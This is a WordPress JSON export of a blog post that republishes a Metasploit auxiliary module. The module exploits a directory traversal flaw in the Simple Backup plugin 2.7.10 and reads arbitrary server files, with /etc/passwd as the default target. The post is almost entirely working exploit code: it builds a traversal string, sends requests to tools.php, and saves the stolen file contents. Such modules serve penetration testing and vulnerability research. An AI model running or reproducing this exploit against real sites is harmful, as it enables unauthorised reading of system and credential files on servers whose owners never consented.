{"id":59346,"date":"2024-09-01T19:20:19","date_gmt":"2024-09-01T16:20:19","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/181075\/wp_simple_backup_file_read.rb.txt"},"modified":"2024-09-01T19:20:19","modified_gmt":"2024-09-01T16:20:19","slug":"wordpress-simple-backup-file-read","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/wordpress-simple-backup-file-read\/","title":{"rendered":"WordPress Simple Backup File Read"},"content":{"rendered":"<p>##<br \/># This module requires Metasploit: https:\/\/metasploit.com\/download<br \/># Current source: https:\/\/github.com\/rapid7\/metasploit-framework<br \/>##<\/p>\n<p>class MetasploitModule &lt; Msf::Auxiliary<br \/>include Msf::Auxiliary::Report<br \/>include Msf::Exploit::Remote::HTTP::Wordpress<br \/>include Msf::Auxiliary::Scanner<\/p>\n<p>def initialize(info = {})<br \/>super(update_info(info,<br \/>&#8216;Name&#8217; =&gt; &#8216;WordPress Simple Backup File Read Vulnerability&#8217;,<br \/>&#8216;Description&#8217; =&gt; %q{<br \/>This module exploits a directory traversal vulnerability in WordPress Plugin<br \/>&#8220;Simple Backup&#8221; version 2.7.10, allowing to read arbitrary files with the<br \/>web server privileges.<br \/>},<br \/>&#8216;References&#8217; =&gt;<br \/>[<br \/>[&#8216;WPVDB&#8217;, &#8216;7997&#8217;],<br \/>[&#8216;PACKETSTORM&#8217;, &#8216;131919&#8217;]],<br \/>&#8216;Author&#8217; =&gt;<br \/>[<br \/>&#8216;Mahdi.Hidden&#8217;, # Vulnerability Discovery<br \/>&#8216;Roberto Soares Espreto &lt;robertoespreto[at]gmail.com&gt;&#8217; # Metasploit Module<br \/>],<br \/>&#8216;License&#8217; =&gt; MSF_LICENSE<br \/>))<\/p>\n<p>register_options(<br \/>[<br \/>OptString.new(&#8216;FILEPATH&#8217;, [true, &#8216;The path to the file to read&#8217;, &#8216;\/etc\/passwd&#8217;]),<br \/>OptInt.new(&#8216;DEPTH&#8217;, [ true, &#8216;Traversal Depth (to reach the root folder)&#8217;, 6 ])<br \/>])<br \/>end<\/p>\n<p>def check<br \/>check_plugin_version_from_readme(&#8216;simple-backup&#8217;, &#8216;2.7.11&#8217;)<br \/>end<\/p>\n<p>def run_host(ip)<br \/>traversal = &#8216;..\/&#8217; * datastore[&#8216;DEPTH&#8217;]filename = datastore[&#8216;FILEPATH&#8217;]filename = filename[1, filename.length] if filename =~ \/^\\\/\/<\/p>\n<p>res = send_request_cgi(<br \/>&#8216;method&#8217; =&gt; &#8216;GET&#8217;,<br \/>&#8216;uri&#8217; =&gt; normalize_uri(wordpress_url_backend, &#8216;tools.php&#8217;),<br \/>&#8216;vars_get&#8217; =&gt;<br \/>{<br \/>&#8216;page&#8217; =&gt; &#8216;backup_manager&#8217;,<br \/>&#8216;download_backup_file&#8217; =&gt; &#8220;#{traversal}#{filename}&#8221;<br \/>}<br \/>)<\/p>\n<p>unless res &amp;&amp; res.body<br \/>vprint_error(&#8220;Server did not respond in an expected way.&#8221;)<br \/>return<br \/>end<\/p>\n<p>if res.code == 200 &amp;&amp;<br \/>res.body.length &gt; 0 &amp;&amp;<br \/>res.headers[&#8216;Content-Disposition&#8217;] &amp;&amp;<br \/>res.headers[&#8216;Content-Disposition&#8217;].include?(&#8216;attachment; filename&#8217;) &amp;&amp;<br \/>res.headers[&#8216;Content-Length&#8217;] &amp;&amp;<br \/>res.headers[&#8216;Content-Length&#8217;].to_i &gt; 0<\/p>\n<p>vprint_line(&#8220;#{res.body}&#8221;)<br \/>fname = datastore[&#8216;FILEPATH&#8217;]\n<p>path = store_loot(<br \/>&#8216;simplebackup.traversal&#8217;,<br \/>&#8216;text\/plain&#8217;,<br \/>ip,<br \/>res.body,<br \/>fname<br \/>)<\/p>\n<p>print_good(&#8220;File saved in: #{path}&#8221;)<br \/>else<br \/>vprint_error(&#8220;Nothing was downloaded. You can try to change the DEPTH parameter or verify the correct filename.&#8221;)<br \/>end<br \/>end<br \/>end<\/p>\n","protected":false},"excerpt":{"rendered":"<p>### This module requires Metasploit: https:\/\/metasploit.com\/download# Current source: https:\/\/github.com\/rapid7\/metasploit-framework## class MetasploitModule &lt; Msf::Auxiliaryinclude Msf::Auxiliary::Reportinclude Msf::Exploit::Remote::HTTP::Wordpressinclude Msf::Auxiliary::Scanner def initialize(info = {})super(update_info(info,&#8216;Name&#8217; =&gt; &#8216;WordPress Simple Backup File Read Vulnerability&#8217;,&#8216;Description&#8217; =&gt; %q{This module exploits a directory traversal vulnerability in WordPress Plugin&#8220;Simple Backup&#8221; version 2.7.10, allowing to read arbitrary files with theweb server privileges.},&#8216;References&#8217; =&gt;[[&#8216;WPVDB&#8217;, &#8216;7997&#8217;],[&#8216;PACKETSTORM&#8217;, &#8216;131919&#8217;]],&#8216;Author&#8217; =&gt;[&#8216;Mahdi.Hidden&#8217;, # &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-59346","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59346","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=59346"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59346\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=59346"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=59346"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=59346"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}